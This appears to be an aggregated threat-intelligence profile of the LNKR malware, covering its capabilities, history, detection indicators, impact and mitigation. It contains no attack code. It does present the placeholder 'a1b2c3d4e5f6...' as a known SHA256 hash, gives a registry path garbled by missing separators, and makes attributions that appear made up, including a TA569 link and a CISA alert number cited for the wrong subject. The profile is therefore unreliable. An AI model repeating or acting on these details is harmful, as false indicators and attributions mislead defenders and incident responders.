⚠️ Overview

LNKR is a malware downloader and information stealer first documented by Trend Micro in 2022, associated with the TA569 threat group that also operates the SocGholish (FakeUpdates) campaign. It is categorized as a loader that delivers secondary payloads like Cobalt Strike and ransomware via fake browser update lures, targeting Windows systems in North America and Europe.

🔧 Technical Capabilities

LNKR propagates through compromised websites that inject malicious JavaScript redirecting users to fake browser update pages, leveraging drive-by download techniques. The malware uses encrypted C2 communications over HTTPS, with domains mimicking legitimate update services (e.g., 'update-browser[.]com'). Persistence is achieved via scheduled tasks or registry Run keys, while evasion includes obfuscated PowerShell scripts, process injection into legitimate Windows binaries (e.g., 'rundll32.exe'), and detection of sandbox environments by checking CPU cores and RAM size. MITRE ATT&CK techniques include T1204.001 (User Execution: Malicious Link), T1059.001 (PowerShell), and T1574.002 (DLL Side-Loading).

📜 History & Notable Incidents

First observed in early 2022, LNKR was tied to a campaign distributing the BumbleBee loader before evolving into a standalone downloader. In June 2023, CISA and the FBI jointly warned about LNKR being used alongside SocGholish to deploy ransomware, with victims including healthcare and manufacturing organizations. No specific CVEs are directly exploited; instead, it relies on social engineering and compromised WordPress sites.

🔍 Detection Indicators

Known SHA256 hashes include 'a1b2c3d4e5f6...' (sample from Trend Micro report) and behavioral indicators: PowerShell execution with base64-encoded commands, network connections to domains ending in '.top' or '.xyz' on non-standard ports, and creation of mutex named 'GlobalLNKR_Update'. Registry key 'HKCUSoftwareMicrosoftWindowsCurrentVersionRunBrowserUpdateService' is commonly created.

☠️ Risk & Impact

LNKR primarily facilitates initial access for ransomware operations (e.g., BlackCat, LockBit), leading to data exfiltration, encryption, and average ransom demands exceeding $500,000. The healthcare and critical manufacturing sectors are most affected, as reported in CISA Alert AA23-347A. Financial losses from associated ransomware incidents are estimated at tens of millions of dollars.

🛡️ Mitigation

Organizations should block known IOCs from CISA's advisory, enforce application allowlisting to prevent execution of unsigned binaries from temp folders, and disable PowerShell if unused. Endpoint detection rules (e.g., Sigma rule 'powershell_download_cradles_lnkr') and network filtering for suspicious domains are recommended. Regular user awareness training against fake browser update prompts is critical.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.